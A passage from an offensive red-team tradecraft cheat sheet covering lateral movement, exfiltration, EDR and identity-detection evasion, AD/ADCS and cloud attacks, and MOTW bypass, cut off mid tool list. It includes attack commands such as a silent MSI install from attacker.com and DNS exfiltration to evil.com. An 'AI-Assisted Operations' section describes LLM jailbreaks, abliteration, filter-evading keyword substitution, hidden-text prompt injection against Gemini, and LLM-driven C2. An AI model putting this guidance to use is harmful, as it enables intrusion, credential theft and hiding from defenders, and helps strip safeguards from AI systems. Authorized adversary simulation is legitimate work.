Risk Levels: PsExec (HIGH β service creation 7045), WMI execution (MEDIUM β WmiPrvSE parent), DCOM execution (LOW-MED), SCShell service config change (LOW β Event 7040, not 7045), Named pipe C2 (LOW β no new process). Prefer fileless and port-135-only techniques where possible.
Pass-the-Hash / Pass-the-Ticket / Overpass
Reuse captured credentials without knowing plaintext passwords
- Pass-the-Hash (PtH): Use NT hash directly via NTLM β works with SMB, WMI, WinRM, RDP (Restricted Admin)
- Pass-the-Ticket (PtT): Inject stolen Kerberos TGT/TGS β
Rubeusptt /ticket:base64 - Overpass-the-Hash: Use NT hash to request a Kerberos TGT β avoids environments blocking NTLM
- Pass-the-Certificate: Use stolen ADCS certificate for PKINIT β
Certipyauth -pfx cert.pfx - Detection: Event 4624 Type 9 (PtH), 4768 with unusual encryption types (overpass)
SCShell & Fileless Service Execution
Lateral movement via service configuration changes β no new service, port 135 only
SCShell: Changes existing service's binary path β starts service β restores original path- No Event 7045: Modifies existing services β avoids #1 lateral movement detection
- Port 135 only: Uses DCERPC/SVCCTL β does not require SMB (445)
- Modified SCShell: Find stopped services with DLLs NOT in System32 β replace DLL + start service
- Authentication: Supports pass-the-hash natively
- OPSEC: Event 7040 (service config change) may fire β but far less monitored than 7045
Advanced DCOM Techniques
Novel DCOM methods for fileless lateral movement with reduced detection surface
- Fileless DCOM: Forshaw research β fileless lateral movement with free PPL protection for beacons
GoExecDCOM htafile: Usesdcom/urlmonto load URL Moniker executing JScript β stealthiest with inline JScript- WMI Event Sub: Async WMI via Event Subscription to run DLL-hijackable binary β port 135 only, no 445
wmiexec-Pro: Port 135 only β no SMB required- Cross-Session Activation: DCOM-based cross-session activation for lateral movement + privilege escalation
C2 Pivoting (SMB / TCP)
Chain beacons through internal networks β only first hop needs internet access
- SMB Named Pipe: Parent beacon communicates with child over SMB pipe β port 445
- Architecture: Internet beacon (HTTPS) β SMB child β SMB grandchild β deep network
- OPSEC: Only the first beacon touches the internet β internal traffic is SMB/TCP (normal)
- Risk: If parent beacon dies, all children lose connectivity β set up redundant paths
Invoke-SMBRemoting: Interactive shell over Named Pipes β fileless SMB lateral movement
Token Impersonation
Steal tokens from running processes to impersonate other users
- Token impersonation: Duplicate access token from another process β requires
SeImpersonatePrivilege elevate_pid_bof: BOF that steals process token by PID β inline, no fork & runincognito: Token enumeration and impersonation β list all available tokens- Potato family:
SweetPotato/PrintSpoofer/GodPotatoβ escalate from service accounts to SYSTEM - OPSEC: Token theft is local β no network traffic, no new logon events
RDP & WinRM Advanced
Programmatic RDP and WinRM for lateral movement
SharpRDP: Send keystrokes programmatically over RDP β adjust for non-English keyboard layoutsHiddenDesktop: HVNC for Cobalt Strike β hidden virtual desktop for interactive accessevil-winrm: Full interactive PS session with upload/download/module loadingbof-winrm-client: WinRM client as Beacon Object File for inline execution- RDP relay: Impacket ntlmrelayx RDP relay server β relay RDP auth to SMB or HTTP
// Exfiltration & Data Staging
Getting data out without triggering DLP, proxy inspection, or network anomaly detection. Blend with normal traffic patterns.
HTTPS C2 Channel
Exfiltrate data through the existing C2 channel β simplest approach
- Chunking: Large files split into small chunks matching normal C2 traffic size
- Malleable profile: Data embedded in POST body, cookies, or URL parameters mimicking legitimate traffic
- Timing: Match exfil rate to normal C2 callback interval β don't suddenly spike bandwidth
- Limitation: Slow for large volumes β constrained by C2 sleep time and chunk size
DNS Exfiltration
Encode data in DNS queries β works even in heavily restricted networks
- Concept: Encode data as subdomains β
base64data.evil.comβ DNS query to your NS dnscat2: Full C2 over DNS β TXT, CNAME, MX, A recordsiodine: IP-over-DNS tunnel β full network connectivity through DNS- DOH: DNS queries via HTTPS to Cloudflare/Google β encrypted, harder to inspect
- Detection: Anomalous DNS query volume, long subdomain strings, unusual record types
Cloud Storage & Staging
Upload to legitimate cloud services β blends with normal SaaS traffic
- OneDrive / SharePoint: Use victim's own M365 token β appears as normal usage
- Azure Blob Storage: SAS token upload β looks like normal Azure API calls
- OPSEC: Use the org's existing cloud provider β traffic to their own tenant is least suspicious
- Compress: 7z, zip β reduces transfer size and obscures file types
- Password-protected archives:
7z a -pPASSWORD -mhe=on archive.7z data/(encrypts filenames too) - Naming: Rename archives to look benign (.log, .tmp, .bak)
// OPSEC Considerations
Operational security separates a noisy pentest from a realistic adversary simulation. Every action has a detection signature β know what you're generating.
The Big 5 that get operators caught: Default C2 profiles (JA3/JARM flagged), running Mimikatz directly, PsExec everywhere (service creation 7045), touching LSASS without evasion, and failing to clean up after objectives.
Detection Risk by Action
ACTION RISK LEVEL DETECTION SOURCE Phishing email sent LOW Email gateway, user reporting HTML smuggling opened LOW Browser telemetry (limited) Shellcode loader executed MEDIUM AV static scan, AMSI (if not bypassed) C2 beacon callback LOW-MED Network IDS, JA3/JARM fingerprint AMSI/ETW patch MEDIUM EDR memory integrity checks Process injection (cross-process) HIGH Kernel callbacks, ETW, Sysmon 8/10 LSASS access VERY HIGH ObRegisterCallbacks, Sysmon 10, EDR Mimikatz execution VERY HIGH Static + behavioral + memory sigs PsExec lateral movement HIGH Service creation 7045, named pipe, SMB write WMI remote execution MEDIUM WMI-Activity log, Event 4648 DCOM execution LOW-MED Process creation from DCOM host process Scheduled task creation MEDIUM Event 4698, Sysmon DCSync VERY HIGH Event 4662, DRS replication from non-DC Large data transfer HIGH DLP, NetFlow anomaly, proxy logs
MDI & Identity Detection Evasion
Bypass Microsoft Defender for Identity, CrowdStrike Identity, and identity-layer detections
ldapx: LDAP proxy that modifies queries in-transit β strip suspicious attributes before MDI sensors- MDI LDAP bypass: Use
objectGUID=*filter + ReplaceTautologies to avoid MDI LDAP query signature - DCSync from DC account: Use the DC's own machine account β Elastic rules skip accounts ending in
$ - Certipy PKINIT evasion: Use Schannel authentication instead of PKINIT to avoid MDI detection
- ADCS recon via ADWS: Use Active Directory Web Services instead of LDAP β different detection surface
- SCCM tool OPSEC: sccmhunter uses Impacket backend β prefer LDAP queries or
ldeepsccm module
Canary Token & Honeypot Detection
Detect traps before you trigger them β canary tokens, honey files, and ProjFS detection
IndicatorOfCanary: Detect canary tokens in documents, DNS, web before triggering alerts- ProjFS detection: Use
PrjGetOnDiskFileStateAPI to detect ProjFS-tracked directories used by Thinkst - AWS canary evasion: Thinkst canary tokens leak token ID in username β send fake events with spoofed IP
- Cortex fake data: Hooks
samcli.dllfunctions to return fabricated data β validate through alternative APIs - MDE emulator detection: Resolve
MpSomeSandboxOnlyFunctionto check for fake processes
Network OPSEC
C2 traffic, DNS, and network-level detection avoidance
- JA3/JA3S fingerprinting: TLS client hello is unique β default CS has known JA3. Mitigate: nginx in front
- Domain categorization: Uncategorized domains = suspicious β get categorized before use
- User-Agent: Match the target org's browser/OS distribution β Chrome on Windows, not curl/python
- Residential proxies: IPRoyal, SmartProxy, Decodo, BrightData for IP rotation
- Traffic volume: Sudden spike in HTTPS to a new domain = network anomaly detection trigger
Staying Quiet
Principles for minimizing detection footprint throughout the engagement
- Live off the land: Use legitimate tools already on the system when possible
- Inline execution: Run BOFs/inline .NET instead of fork & run β no child processes
- Minimize cross-process operations: Injection, handle access trigger kernel callbacks
- Sleep long: 60s+ sleep with high jitter (50%+) β reduces beacon frequency
- Work hours only: Operate during business hours to blend with normal admin activity
- Vary IOCs: Different named pipes, URIs, user-agents per target host
// Privilege Escalation
From standard user to SYSTEM, Domain Admin, or cloud admin. Local privilege escalation is often the first step after initial access.
Local Privilege Escalation
Standard user to SYSTEM β service misconfigurations, installer abuse, and unpatched vulnerabilities
- WSUS LPE: HTTP WSUS server exploitation with delivery optimization bypass
- CVE-2025-52915: Windows Update Stack privilege escalation β abuse update mechanism for SYSTEM
- TrustedInstaller via DISM API: Elevate to TrustedInstaller β can stop PPL-protected EDR services
RAITrigger: WebDAV local SYSTEM authentication trigger for relaying to LDAP/SMBEnableEFS: Enable EFS service as low-priv user for coercion attacks- Unquoted service paths: Classic β place binary in path gap of unquoted service executable paths
BYOVD & Kernel Exploitation
Bring Your Own Vulnerable Driver to terminate EDR or gain kernel access
- BYOVD concept: Load a signed but vulnerable kernel driver β exploit it to gain kernel-level access
Sunder/appid.sys: Vulnerable drivers for terminating EDR processes from kernel mode- Cortex blocks all loldrivers.io: Flags drivers by hash AND Authenticode signature β need unknown vulnerable drivers
- EDR-Freeze:
WerFaultSecure-based process suspension against EDR β works on Win11 Pro, fails Enterprise (PPL) - PPL exploitation: Protected Process Light prevents direct access β requires kernel-level exploit or TrustedInstaller
AD Privilege Escalation
Domain escalation via Kerberos relay, delegation abuse, and certificate exploitation
KrbRelayUp: Kerberos relay-based local privilege escalation β relay to gain SYSTEM- BadSuccessor (dMSA): Delegated Managed Service Account privesc on Windows Server 2025 β
SharpSuccessor - NTLM Reflection (CVE-2025-33073): SMB to LDAPS relay even with LDAP signing AND channel binding enabled
- RBCD: Still works after Shadow Credentials patch β set up delegation on computer objects you control
- S4U2Self: Use machine NT hash for ticket impersonation β request ticket as any user to the machine
// Active Directory Attacks
ADCS exploitation, Kerberos attack chains, Shadow Credentials, and comprehensive AD enumeration. Active Directory remains the primary target in enterprise red team engagements.
ADCS Exploitation (ESC1βESC15)
Active Directory Certificate Services β most prolific escalation path in modern AD environments
- ESC1: Vulnerable template allows attacker to specify SAN β request cert as any user
- ESC4 β ESC1 chain: Modify vulnerable template to enable ESC1 β propagation to CA can take up to 8 hours
- ESC4 β Enrollment Agent: Alternative when ESC1 conversion fails due to DNS SAN requirements
- Golden Cert: Forge any certificate with stolen CA private key β ultimate persistence
Certipy: All-in-one ADCS exploitation β find, exploit, and forge certificates- Stealthy ADCS recon: Query via ADWS instead of LDAP β avoids LDAP-based detection
Kerberos & Delegation Attacks
Kerberoasting, Shadow Credentials, constrained/unconstrained delegation abuse, and ticket forging
- Shadow Credentials: Jan 2026 patch broke self-write β bypass: set CustomKeyInformation flags to
0x02(MFA_NOT_USED).keycredby RedTeam Pentesting - Kerberoasting evasion: Use
--stealthflag in Impacket. Note: Microsoft killing RC4 in Kerberos by 2026 β impacts kerberoasting Timeroasting: Attack based on Kerberos timestamp encryption β novel credential extraction- Unconstrained delegation: Monitor for TGTs with
Rubeus monitorβ capture and reuse - Constrained delegation: S4U2Proxy abuse to access services as any user
DCSync & NTDS Extraction
Extract domain credentials via replication protocol or direct NTDS.dit access
- DCSync OPSEC: Use the machine account of a DC β Elastic rules skip
$accounts for Event 4662 DSInternals: DCSync from Windows β reportedly undetected by several EDRs. Available as BOFADCSSync: Alternative to DCSync β requests certificate per user from ADCS. Works against Cortex- ntdsutil.exe snapshot: Mount VSS snapshot and copy NTDS.dit β undetected by Cortex XDR
- DPAPI domain backup key: DCSync retrieves key β decrypt any user's DPAPI-protected secrets
Token & Session Theft
Extract Azure AD tokens, Primary Refresh Tokens, and Windows token broker cache
- Windows Token Broker Cache:
NetExec wammodule for extracting cached tokens aadprt BOF: Acquire Primary Refresh Tokens (PRT) β PRTs have MFA + device claimsSeamlessPass: Convert Kerberos tickets to M365 access tokens via Seamless SSOSignalKeyBOF/WhatsAppKeyBOF: Extract encryption keys from Signal/WhatsApp desktop- Passwordless ops: When users have no passwords (FIDO2/WHfB) β steal TGT from memory, extract PRT
vSphere Attack Operations
Leverage VMware vSphere access for credential extraction via snapshots and VMDK cloning
- Snapshot method: Create VM snapshot β download .vmem + .vmsn β convert with
vmss2coreto .dmp β mount with MemProcFS - VMDK clone method: Clone VM β download VMDK β parse with
Volumiserto extract SAM/SYSTEM/SECURITY SharpSphere: Tool for vSphere interaction β VM operations, guest file interaction- VM must be running: .vmem files only exist when VM is powered on
- Credential targets: Domain Controllers, Exchange servers, SCCM
AD Enumeration & Tooling
Comprehensive AD enumeration with minimal detection footprint
BloodHound-CE: Custom queries at queries.specterops.io,cypherhoundADExplorerSnapshot: Enhanced with technology detection β SCCM, ADFS, ADCS, LAPS, Exchange auto-detectedbloodyAD: LDAP operations with certificates, PTH to LDAP β SOCKS compatibleShadowHound/SilentHound/BOFHound: Stealthy AD enumeration β significantly less noise than SharpHoundRelayInformer: Determine EPA enforcement levels on relay targetsMisconfiguration-Manager: Central knowledge base for SCCM tradecraft β all attack paths
// MOTW Bypass & Delivery Techniques
Mark-of-the-Web controls are the frontline defense against downloaded payloads. These techniques bypass MOTW tagging, SmartScreen checks, and container-based protections.
MOTW Bypass Techniques
Bypass Mark-of-the-Web tagging to avoid SmartScreen and Protected View
- Archive types preserving ADS: WinRAR (.rar) and 7zip WIM (.wim) format preserve ADS on extraction
- RAR MOTW gaps: WinRAR tags LNKs but NOT:
XLL, JS, URL, CLICKONCE, IQY, CPL, WSF, CHM - Polyglot LNK data: Data appended to LNKs or stored in ADS has no MOTW
- WebDAV delivery: Files served via WebDAV may avoid download-based MOTW tagging
- curl downloads: Files downloaded via
curl.exemay lack MOTW in certain configurations - Trusted locations: Office XLSTART / template directories are trusted β no MOTW checks applied
LNK-Based Delivery Chains
LNK files remain the most effective initial trigger β hard for Microsoft to kill
- LNK chaining: Split complex commands across LNKβ β LNKβ β LNKβ to stay under EDR thresholds
- PATHEXT manipulation:
SET PATHEXT=.PNG;%PATHEXT%β CMD treats PNG as executable - LNK + MSHTA polyglot: LNK simultaneously valid as HTA/VBS β mshta executes LNK directly
LNKSmuggler: Create .lnk files with embedded encoded data in ZIP archives- Keep LNK small: Under 1KB recommended β file-size-based EDR detections trigger on oversized LNKs
Polyglot & Exotic File Formats
Single files valid as multiple formats β confuse parsers and evade type-based detection
- COPY /B polyglot:
COPY /Y /B a.lnk2+b.vbs c.lnkβ appends VBS/ZIP to LNK binary, LNK still functions - .winget files: Execute
winget configurewith YAML DSC β runs arbitrary PowerShell, no SmartScreen. Default on Win11 - KiXtart (.kix/.spk): Ancient obscure scripting with COM automation, WMI, LDAP β zero detection
- IExpress.exe: Built-in Windows tool creates self-extracting installers β resembles known-good carrier
Mitra: Binary polyglot generator for multi-format file creation- BAT/CMD with BOM: UTF-16 BOM prefix on ASCII batch β scanners see UTF-16LE, CMD executes as ASCII
SmartScreen & SAC Bypass
Smart App Control and SmartScreen reputation bypass techniques
- BAT/CMD search order hijack: Create 4-char BAT + hidden calc.bat β SAC allows BAT/CMD launched from CMD
- Expired cert signing: SmartScreen treats binaries with any certificate as less suspicious
- WorstFit: Hidden Windows ANSI character transformations β bypass Sigma rules, path traversals
- MSC files (GrimResource): XSS in MMC console files β chain with MOTW bypass
- Chocolatey abuse:
choco pack+choco install --forceβ reflective DLL loader, no prompts
MSI / MST Weaponization
Abuse Windows Installer for code execution, lateral movement, and persistence
- MSI initial access: Running DLLs via
msiexecwas undetected by CrowdStrike Falcon - MST transforms:
msiexec /i legit.msi TRANSFORMS=evil.mst /qbβ modify legitimate MSI behavior - MS-signed sideload: MSI installs MS-signed EXE vulnerable to DLL sideloading + malicious DLL + startup LNK
- Remote MSI:
msiexec /i http://attacker.com/payload.msi /qβ silent install from URL - Greenshot deser: Legitimate app + crafted
.greenshotfile triggers .NET deserialization RCE
// Cloud Attack Operations
Azure/Entra ID, AWS, and GCP attack techniques. Cloud environments have different attack surfaces, detection mechanisms, and persistence opportunities than traditional on-prem infrastructure.
Azure / Entra ID Initial Access
Password spraying, MFA fatigue, and token theft against Microsoft cloud identity
- IP-rotated spraying:
CredMasterwith FireProx/AWS API Gateway for source IP rotation per request - Smart Lockout bypass: Residential proxy rotation targeting same region/city as target HQ
- MFA phone fatigue:
m365-fatigueβ trigger alternative MFA (phone calls) until user accepts - UPN vs email mismatch: UPN may differ from email β
TeamsEnumto pull real UPNs o365spray/TrevorSpray/TeamFiltration: M365 enumeration + spraying tools
Conditional Access Policy Bypass
Circumvent Entra ID Conditional Access Policies for device compliance, MFA, and location
- Client ID brute force: Try all possible client IDs to find one that passes CAP
- Fake device compliance: Register device + talk to Intune via OMA Device Management sync protocol
PoCEntraDeviceComplianceBypass: Pure PowerShell PoC to bypass Entra/Intune Compliance CA Policy- CAP exclusion gaps: If policy requires MFA for "All resources" but excludes one, Microsoft auto-adds additional exclusions
TokenSmith: Bypassing Intune Compliant Device CA β generates compliant-appearing tokens
Cloud Post-Exploitation & Enumeration
Enumerate Entra ID, M365, SharePoint, and Azure resources after initial access
GraphSpy: Browser GUI for AAD/O365 β file search across SPO/OneDrive/Mail/Teams + passkey enrollmentROADtools/ROADrecon: Uses legacy Azure AD Graph API which does NOT log read actions β stealthierAPEX: Azure Post Exploitation Framework β ROADrecon + GraphRunner + CA policy enumeration- Stealth: Legacy AAD Graph endpoint does not log reads β most orgs don't capture MicrosoftGraphActivityLogs
GraphPreConsentExplorer: First-party Entra clients with pre-consented Graph scopes
Cloud Persistence Mechanisms
Maintain access after initial compromise β survives password changes and MFA resets
- App Registration: Create application + client secret + API permissions β survives pw change + MFA reset
- Passkey enrollment: Add passkey using only access token β counts as phishing-resistant MFA
- Refresh token persistence: Captured refresh tokens survive password changes β refresh until revoked
- AWS Role Juggling:
AWSRoleJugglerβ maintain persistent access by juggling between assumable IAM roles - GCP DWD abuse:
DelePwnβ exploit Domain-Wide Delegation misconfig to impersonate any GCP user
AWS Attack Operations
AWS-specific attack techniques from initial access to persistence and lateral movement
- AWS SSO device code:
aws sso loginenables device code phishing β accesses ALL SSO accounts. No CA policy to block - GitHub Actions OIDC abuse: Compromise repo β exploit OIDC trust to access AWS β GuardDuty likely won't flag
- Self-hosted runners theft: Copy runner directory to your server β invisibly become the pipeline runner
AWS-Key-Hunter: Real-time monitoring of GitHub for exposed valid AWS keys- Canary token evasion: Thinkst canary tokens leak token ID in username β send fake events with spoofed IP to confuse SOC
On-Prem to Cloud Pivoting
Leverage on-premises AD compromise to gain access to Azure/Entra ID cloud resources
- SeamlessSSO (DesktopSSO): Dump
AZUREADSSOACC$NT hash β forge Kerberos Silver Ticket β exchange for Azure access token - Flow: Silver Ticket β SOAP request to
autologon.microsoftazuread-sso.comβ DesktopSsoToken β SAML Assertion β tokens SeamlessPass: Automated tool for leveraging Kerberos tickets for cloud access- PRT workflow: ROADrecon nonce β
aadprtBOF for PRT-cookie β authenticate ROADrecon with msgraph - Internal recon targets: SharePoint, Confluence, internal Git, wikis β look for tokens, .env, Terraform configs
// Notable CVEs (2025)
Critical vulnerabilities from 2025 that enable initial access, lateral movement, or infrastructure compromise.
CVE-2025-5777 β Citrix Bleed 2
Session token leak via Citrix NetScaler β affects newer versions beyond original CitrixBleed
- Impact: Unauthenticated attackers can extract valid session tokens from NetScaler memory
- No credentials needed: Bypass authentication entirely by replaying stolen session tokens
- Scope: Any internet-facing Citrix NetScaler Gateway or ADC running affected versions
- Red team use: Initial access to corporate networks via Citrix without phishing or credential spraying
CVE-2025-1974 β IngressNightmare
Unauthenticated RCE in Kubernetes NGINX Ingress Controller β critical infrastructure compromise
- No auth required: Exploitable without any credentials or prior access to the cluster
- Blast radius: Ingress controllers see all cluster traffic β compromise enables secret theft, lateral movement, cluster takeover
- Prevalence: NGINX Ingress is the most popular Kubernetes ingress controller β massive attack surface
- Red team use: Direct path from internet to Kubernetes cluster compromise without phishing
CVE-2025-24016 β Wazuh Unsafe Deserialization
RCE in Wazuh SIEM via crafted serialized objects β compromise security monitoring infrastructure
- Irony: Exploiting the SIEM gives attackers control over the very system designed to detect them
- Post-exploitation: Disable alerts, modify rules, blind the SOC β then operate freely across the network
- Attack path: Send crafted serialized objects to Wazuh API β achieve RCE on SIEM server
- Red team use: Neutralize detection infrastructure early for unrestricted operations
// macOS & Linux Red Teaming
Cross-platform techniques for non-Windows environments. Linux boxes commonly lack EDR, and macOS has unique security boundaries (TCC, Gatekeeper) that require specific bypass knowledge.
macOS Initial Access & Persistence
macOS-specific attack vectors, persistence mechanisms, and security bypass
- Homebrew abuse: Similar to Chocolatey on Windows β create malicious packages for code execution
- VS Code extension abuse: Exploit VS Code's bootstrapping to quietly load malicious plugins
- Electron/Node.js stealers: Very low detection rates β hard to distinguish from legitimate apps at binary level
- BLE C2 implant: Client/server using Bluetooth Low Energy β no complaints from TCC, Gatekeeper, or code signing
- BLE password exfil: Exfiltrate passwords from fake macOS prompts over BLE to nearby laptop
pamspy: eBPF-based credential dumper β hooks PAM to capture sudo/su/ssh credentials
Linux Post-Exploitation
Linux systems commonly lack EDR β outbound traffic is less anomalous than Windows
- Linux beachheads: Linux systems often have missing EDR agents β ideal for initial beachhead
- Kerberos on Linux: Tickets stored in
/tmp/krb5cc_*or kernel keyring β steal for PtT attacks pamspy: eBPF-based credential capture β hooks PAM for sudo/su/ssh without needing a PAM module- Container escapes: Docker socket access, privileged containers, host PID namespace abuse
- LD_PRELOAD hijack: Set
LD_PRELOADto load malicious shared library before legitimate ones - Cross-platform C2: Sliver (Go), Mythic agents (Poseidon/Medusa) β native Linux support
VPN Client Exploitation
Abuse VPN clients for code execution and lateral movement on macOS and cross-platform
NachoVPN: Malicious SSL-VPN server exploiting VPN client configurations- Cisco AnyConnect: Executes VBS without prompting when connecting to malicious VPN server
- GlobalProtect LPE: Local privilege escalation through GlobalProtect VPN client
- Target selection: VPN admins/support staff are ideal targets β likely to test connection profiles
- Does not work through ZScaler β direct VPN connection required
Developer Targeting & Supply Chain
Target developers through malicious projects, packages, and IDE exploitation
- Malicious .suo / EvilSln: Visual Studio project opening triggers code execution via .suo files
- Backdoored compilation: Rust project executes payload during
cargo buildβ target devs via "compiler error" pretext - GitHub typosquatting: Lookalike account + fork repos + backdoored release + GitHub project invitation emails
npmphish: Device code phishing for npmjs.com β capture sessions and backdoor packages- pip/npm supply chain: Backdoored packages targeting internal caches (Artifactory)
// AI-Assisted Operations
LLM jailbreaking, AI-driven C2, autonomous agents, deepfake generation, and AI-assisted code development. The intersection of AI and offensive security is rapidly expanding the operator's toolkit.
LLM Jailbreaking & Uncensoring
Bypass LLM safety alignment to generate offensive content β from prompt tricks to model surgery
- Crescendo: Multi-turn jailbreak using smart many-shot prompts to gradually coerce restricted conversations
L1B3RT4S: Collection of LLM jailbreak/liberation prompts for various models- Abliteration:
FailSpy/abliteratorremoves safety alignment from LLMs β create LoRA from diff, apply to other models - Keyword substitution: Replace flagged words ("spoof" β "normalization") to bypass content filters
- Local uncensored: Run
llama2-uncensoredvia Ollama β no guardrails, full offensive capability Red Team Arena(redarena.ai): Platform for practicing LLM jailbreak techniques
AI-Driven C2 & Autonomous Agents
LLM-powered command and control β non-deterministic code generation defenders can't signature
- AI C2 architecture: Human query β LLM generates Python/Lua code β feed into C2 agent loader β code unknown to defenders
Claude-C2: Uses MCP (Model Context Protocol) server for C2 communicationDrone: NLP for on-host actions β "scan the local subnet for machines with RDP open"- Mythic MCP: Claude Sonnet driving Mythic C2 (Apollo agent) via MCP protocol
LitterBox MCP: Iteratively test payloads against detection, edit and recompile until bypassing DefenderNerve: Create LLM agents via YAML tasklets β autonomous vulnerability discovery
AI for Phishing & Social Engineering
AI-generated landing pages, foreign language phishing, and realistic visual content
SitesGPT: AI website builder producing realistic sites with non-obvious AI images- Cursor/Windsurf/Bolt: AI-powered editors for creating phishing landing pages with self-decrypting capabilities
- Foreign language phishing: LLMs apply idioms, dialects, and specific wording far better than Google Translate
- Gmail Gemini injection: Embed invisible white text attack prompt β Gemini "Summarize" outputs malicious link
- Computer-Using Agents: OpenAI Operator and similar automate identity attacks at scale with no-code
AI for Code Development & Malware
Using LLMs to write, debug, obfuscate, and iterate on offensive tooling
- Cursor + Claude 3.5: Best combination for initial payload skeletons β Claude understands x64dbg screenshots
- Deepseek-r1: Poor at code generation but excellent at debugging and fixing issues
- Grok 3: No content restrictions observed for EDR unhooking discussions
RamiGPT: Autonomous privilege escalation using OpenAI β feeds system info, gets escalation paths- Local stack: Ollama (backend) + OpenWebUI (GUI with RAG) + Continue.Dev (VS Code Copilot replacement)
AI for Reverse Engineering
LLM-assisted binary analysis, deobfuscation, and attack path discovery
GhidraMCP: MCP Server for Ghidra β AI-assisted reverse engineering and binary analysisIDA Pro MCP: MCP Server for IDA Pro. Caution: some IDA MCP servers can be tricked into executing code from samplesBloodHound-MCP: MCP integration for AI-assisted AD attack path analysis and discovery- F5 WAF deobfuscation: Pipe obfuscated F5 ASM JavaScript into GPT/Claude for instant deobfuscation
Dyana: Sandbox for profiling ML models, ELFs, Pickle files, JavaScript for vulnerability analysis
// OSINT & Reconnaissance
Open-source intelligence gathering and external reconnaissance. Map the target's attack surface before engagement β cloud assets, email addresses, breach data, and exposed services.
Cloud & Workspace Recon
Enumerate Microsoft 365, AWS, and other cloud services for attack surface mapping
Awseye: Unauthenticated AWS account enumeration and enrichmentMSFTRecon: Microsoft 365 reconnaissance β enumerate tenant information, domains, and servicesATEAM: NetSPI AWS enumeration β discover and map AWS resources from external perspectivePorch-Pirate: Postman workspace credential harvesting from public collections- Data types: API keys, OAuth tokens, database credentials, service account passwords
Breach Intelligence & Email Harvesting
Leverage breach databases for credential discovery and password pattern analysis
Hudson Rock: Breach intelligence platform β compromised credentials and infostealer dataWhite Intel: Incident response intelligence β breach data correlated with target organizations- Password patterns: Analyze breached passwords from target org to build targeted wordlists
HunterScrape: Email harvesting from Hunter.io β extract corporate email addresses at scaleProspeo: B2B email finder β discover professional email addresses for targeted phishing
Distributed & Application Scanning
Cloud-based distributed reconnaissance at scale
Axiom: Cloud-based distributed recon β spin up fleet of scanning instances. Works with nmap, ffuf, nucleiMoodle-Scanner: LuemmelSec's Moodle vulnerability scanner with self-updating via file hash cross-checksudpz: SOCKS proxy-compatible UDP service scanner β scan UDP services through C2 SOCKS tunnels- UDP services: DNS, SNMP, NTP, TFTP β often unmonitored and misconfigured on internal networks
Stealthy AD Enumeration
Active Directory enumeration tools that minimize detection footprint
ShadowHound: PowerShell-based AD enumeration β no binary on disk, runs entirely in memorySilentHound: Stealthy LDAP enumeration β minimal queries, low-noise AD data collectionBOFHound: BloodHound data collection via Beacon Object Files β inline execution, no fork & runAdalanche: ACL visualization and analysis β identify attack paths through AD permission chains- OPSEC advantage: These tools generate significantly less noise than SharpHound/bloodhound-python
// Password Cracking Infrastructure
Distributed cracking rigs, cloud GPU rental, wordlist generation, and rule development. Efficient password cracking is a force multiplier for every credential harvested during an engagement.
Distributed Cracking Platforms
Scale password cracking across multiple nodes β serverless, on-prem, and GPU-accelerated
NPK: Serverless cracking platform β Terraform/Ansible deployment on AWS with auto-scaling GPU instancesHashtopolis: On-prem distributed agent-based cracking β split work across multiple machineshashcat: GPU-accelerated core cracking engine β supports 300+ hash types, rules, masks, and hybrid attacks
Cloud GPU Rental
Rent GPU compute for cracking sessions β cost-effective alternative to building dedicated hardware
vast.ai: Cheapest GPU compute marketplace β rent consumer and datacenter GPUs on demandRunPod: GPU instances optimized for ML workloads β easily repurposed for hashcatSaladCloud: Distributed GPU network β leverage idle consumer GPUs for cracking- Pricing: ~$0.20-0.50/hr for consumer GPUs (RTX 3090/4090) vs $2-5/hr for datacenter A100s
- Strategy: Consumer GPUs offer best price/performance for most hash types; A100s for bcrypt/scrypt
Wordlist Generation & Rules
Targeted wordlist creation and organization-specific rule development
Brutas: Handcrafted targeted wordlists β built from organization-specific intelligenceSkweez: Website scraper wordlist generator β extract terms from target's web presenceWikiRaider: Wikipedia-based wordlist generation- Common patterns: Season+Year (
Winter2025!), Company+Numbers (Contoso123), Keyboard walks - Iteration: Crack initial batch β analyze patterns β refine rules β crack more
- Rainbow tables (NTLMv1): Google Cloud BigQuery for massive rainbow table lookups β instant cracking
// Tool Arsenal
Essential tools organized by operation phase. Not exhaustive β these are the workhorses.
Tool Reference by Phase
INFRASTRUCTURE βββ Cobalt Strike / Havoc / Sliver / Mythic // C2 frameworks βββ Brute Ratel C4 / Nighthawk // Commercial adversary simulation βββ Terraform / Ansible / Nebula / Red-Baron // IaC & infra automation βββ GoPhish / EvilGinx / evilgophish // Phishing & AitM platforms βββ StuntBanana / FreePBX / 3CX // Vishing / CID spoofing infrastructure βββ GraphStrike / ProxyBlob / Turnt / Stillepost // Cloud-native C2 redirectors βββ teamsc2 / convoC2 / CS-EXTC2-NTP // Covert C2 channels βββ RedELK / Ghostwriter / VECTR // Red Team SIEM, reporting & tracking INITIAL ACCESS & PAYLOADS βββ msfvenom / Donut / sRDI // Shellcode generation βββ Nim / Rust / C loaders // Custom shellcode loaders βββ Spartacus / DLLSpy / DllShimmer // DLL sideload & hijack weaponization βββ EPIC / Dittobytes / Crystal Palace // PIC builders & metamorphic compilation βββ LNKSmuggler / Mitra // LNK & polyglot generators βββ GraphSpy / TokenPhisher / SquarePhish // Device code phishing βββ NachoVPN // Malicious SSL-VPN server βββ QRucible / recaptcha-phish / Clickfix-Email // Quishing & ClickFix tools EVASION βββ SysWhispers3 / HellsGate / HalosGate // Syscall generation βββ Ekko / Foliage / KrakenMask // Sleep obfuscation βββ ThreadStackSpoofer / SilentMoonwalk // Call stack spoofing βββ Scarecrow / Freeze // Loader generation / obfuscation βββ EDRSilencer / Krueger // EDR network blocking / WDAC kill βββ Null-AMSI / Being-A-Good-CLR-Host // Advanced AMSI bypass βββ Limelighter / sgn // Code signing & shellcode encoding βββ riscy-business / VMProtect // Malware virtualization βββ RedBackdoorer / ConfuserEx // PE file injection & .NET obfuscation POST-EXPLOITATION βββ Rubeus / Certify / Certipy // Kerberos & ADCS βββ Snaffler / Seatbelt // Discovery & credential finding βββ DonPAPI / SharpDPAPI / dploot // DPAPI looting βββ secretsdump.py / pypykatz // Credential extraction βββ nanodump / physmem2profit // Evasive LSASS dumping βββ ChromeKatz / cookie-monster / HackBrowserData // Browser cookie & credential theft βββ LaZagne / goLazagne / BrowserSnatch // All-in-one credential dumping βββ RemoteMonologue / GhostKatz // DCOM-based & physical memory cred extraction βββ SignalKeyBOF / WhatsAppKeyBOF // Messaging app key extraction βββ SCCMDecryptor-BOF // SCCM credential decryption via BOF ACTIVE DIRECTORY βββ Certipy / Certify / Locksmith // ADCS exploitation (ESC1-ESC15) βββ 